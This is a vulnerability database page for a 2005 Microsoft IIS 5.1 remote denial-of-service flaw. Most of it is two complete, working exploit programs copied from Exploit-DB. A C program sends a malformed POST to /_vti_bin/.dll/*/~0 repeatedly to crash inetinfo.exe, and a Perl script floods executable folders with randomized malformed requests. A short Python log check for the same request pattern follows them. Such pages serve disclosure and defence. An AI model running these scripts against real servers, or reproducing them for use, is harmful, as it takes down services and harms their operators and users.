Related Weaknesses
CWE-ID | Weakness Name | Source
CWE-252 | Unchecked Return Value: The product does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions. |
Metrics
Metrics | Score | Severity | CVSS Vector | Source
V2 | 7.8 | | AV:N/AC:L/Au:N/C:N/I:C/A:N | [email protected]
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of other CVEs. The percentile is therefore used to compare the EPSS score of one CVE with that of others.
Exploit information
Exploit Database EDB-ID : 1376
Publication date : 2005-12-18 23h00 +00:00
Author : Kozan
EDB Verified : Yes
/*****************************************************************
Microsoft IIS 5.1 Remote D.o.S Exploit by Kozan
Application: Microsoft IIS (Internet Information Server)
Vendor: Microsoft - http://www.microsoft.com/
Discovered by: Inge Henriksen
Exploit Coded by: Kozan
Credits to ATmaCA, Inge Henriksen
Web: www.spyinstructors.com
Mail: [email protected]
Vulnerable:
Microsoft® Internet Information Server® V5.1
Not vulnerable:
Microsoft® Internet Information Server® V5.0
Microsoft® Internet Information Server® V6.0
Only folders with Execute Permissions set to 'Scripts & Executables'
are affected, such as the '_vti_bin' directory.
inetinfo.exe will be crashed after exploitation finished successfully.
Usage: iis51dos.exe [Target Url or IP]
*****************************************************************/
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
char *HttpHeader(char *pszHost)
{
char szHeader[1000];
wsprintf( szHeader, "POST /_vti_bin/.dll/*/~0 HTTP/1.1\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Host: %s\r\n"
"Content-Length: 0\r\n\r\n"
, pszHost
);
return szHeader;
}
int main(int argc, char *argv[])
{
fprintf(stdout, "\n\nMicrosoft IIS 5.1 Remote D.o.S Exploit by Kozan\n"
"Bug Discovered by: Inge Henriksen\n"
"Exploit Coded by: Kozan\n"
"Credits to ATmaCA, Inge Henriksen\n"
"www.spyinstructors.com - [email protected]\n\n"
);
if( argc != 2 )
{
fprintf(stderr, "\n\nUsage:\t%s [WebSiteUrl]\n\n", argv[0]);
return -1;
}
WSADATA wsaData;
struct hostent *pTarget;
struct sockaddr_in addr;
SOCKET sock;
char szHeader[1000], szWebUrl[1000];
lstrcpy(szWebUrl, argv[1]);
lstrcpy(szHeader, HttpHeader(szWebUrl));
if( WSAStartup(0x0101,&wsaData) < 0 )
{
fprintf(stderr, "Winsock error!\n");
return -1;
}
sock = socket(AF_INET,SOCK_STREAM,0);
if( sock == -1 )
{
fprintf(stderr, "Socket error!\n");
return -1;
}
if( (pTarget = gethostbyname(szWebUrl)) == NULL )
{
fprintf(stderr, "Address resolve error!\n");
return -1;
}
memcpy(&addr.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(80);
memset(&(addr.sin_zero), '\0', 8);
fprintf(stdout, "Please wait while connecting...\n");
if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
{
fprintf(stderr, "Connection failed!\n");
closesocket(sock);
return -1;
}
fprintf(stdout, "Connected.\n\n");
fprintf(stdout, "Please wait while sending DoS request headers...\n\n");
for( int i=0; i<4; i++ )
{
fprintf(stdout, "Sending %d. request...\n", i+1);
if( send(sock, szHeader, lstrlen(szHeader),0) == -1 )
{
fprintf(stderr, "%d. DoS request header could not sent!\n", i+1);
closesocket(sock);
return -1;
}
fprintf(stdout, "%d. request sent.\n\n", i+1);
}
fprintf(stdout, "Operation completed...\n");
closesocket(sock);
WSACleanup();
return 0;
}
// milw0rm.com [2005-12-19]
Exploit Database EDB-ID : 1377
Publication date : 2005-12-18 23h00 +00:00
Author : kokanin
EDB Verified : Yes
#!/usr/bin/perl
# _really_ bored kokanin / IIS 5.1 dos thing, Inge says to use a browser at
# http://ingehenriksen.blogspot.com/2005/12/microsoft-iis-remote-dos-dll-url.html
# kokanin not like puny browser!!"#1 I hoped Inge was a leet haxx0r ch1ck, but it's
# apparently a dude, bummer. According to Inge passing a kinda malformed url to
# an executable dir a few times makes inetinfo.exe crap out. Yum, monday. This
# script has insanely elite randomization of the url, it even amazes me.
# Hello ilja, ptp people, others, see you at ccc and stuff.
# sample executable dirs: /_vti_bin/ /_sharepoint/ /scripts/ /cgi-bin/ /msadc/ /iisadmpwd/
# sample malformed url: http://www.example.xom/_vti_bin/.dll/*\~0
# sample run: ./this-crap.pl <www.host.bla> </executable_folder/> <count>
# count should be 4 according to inge, do more!!!!1one MILLIONS I SAY!!!
use List::Util 'shuffle';
use IO::Socket::INET;
$target = shift;
$folder = shift;
$amount = shift;
# main iteration thingie
for(1..$amount){
# construct an array of the reportedly bad characters
for(1..31){ @badchars[$_] = chr($_); }
# append the rest of them
@badchars = (@badchars,"?","\"","*",":","<",">");
# shuffle the array so @shuffled[0] is random
@shuffled = shuffle(@badchars);
# this is the request
$malformed = $folder . ".dll/" . @shuffled[0] . "/~" . int rand(9);
# this is informative text
print "[$_]\t greeting $target with: " . $malformed . "\n";
# create the socket
$socket = new IO::Socket::INET(
Proto => "tcp",
PeerAddr => $target,
PeerPort => "80",
);
# error reporting
die "unable to connect to $target ($!) - omgomgwtf itz dead w00t w00t \n" unless $socket;
# the actual data transmission
print $socket "GET " . $malformed . " HTTP/1.0\r\n" . "Host: $target\r\n" . "\r\n\r\n";
# all done
close $socket;
}
# milw0rm.com [2005-12-19]
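A defender-side check for the request shape both listings above send, as an added example (not part of this page, Exploit-DB, or either author's code): it flags request targets with a `/.dll/` segment followed by one of the listed characters and `~<digit>`, and counts matches per client. The record format, the function names and the single percent-decoding pass are assumptions; the threshold of 4 is the request count given in the listings.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Characters the listings treat as triggers: bytes 1-31 plus ? " * : < >
BAD_CHAR = r'[\x01-\x1f?"*:<>]'
# "/.dll/" segment, one trigger character, then "/~<digit>" (the sample URL in
# the second listing's comments uses "\~<digit>", so accept either slash).
MALFORMED = re.compile(r'/\.dll/' + BAD_CHAR + r'[/\\]~\d')


def is_suspicious(target):
    """True if a request target has the malformed shape, raw or percent-encoded."""
    # Assumption: one round of percent-decoding is enough for this check.
    return bool(MALFORMED.search(target) or MALFORMED.search(unquote(target)))


def hits_by_client(records):
    """Count matching requests per client from (client, request_line) pairs."""
    hits = Counter()
    for client, request_line in records:
        try:
            _method, rest = request_line.split(' ', 1)
            target, _version = rest.rsplit(' ', 1)
        except ValueError:
            continue  # not "METHOD target VERSION"; nothing to inspect
        if is_suspicious(target):
            hits[client] += 1
    return hits


def likely_dos(records, threshold=4):
    """Clients that sent at least `threshold` matching requests."""
    return sorted(c for c, n in hits_by_client(records).items() if n >= threshold)


# Constructed sample records (documentation address ranges), not real traffic.
SAMPLE = (
    [("192.0.2.10", "POST /_vti_bin/.dll/*/~0 HTTP/1.1")] * 4
    + [
        ("198.51.100.7", "GET /_vti_bin/shtml.dll HTTP/1.1"),
        ("198.51.100.7", "GET /scripts/.dll/%3C/~7 HTTP/1.0"),
        ("203.0.113.5", "GET /index.html HTTP/1.0"),
    ]
)

if __name__ == "__main__":
    print(dict(hits_by_client(SAMPLE)))
    print(likely_dos(SAMPLE))
```

A single match is already worth reviewing; the threshold only separates one-off probes from a run of repeated requests.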
Products Mentioned
Configuration 0
Microsoft >> Internet_information_services >> Version 5.1
Microsoft >> Windows_xp >> Version -
References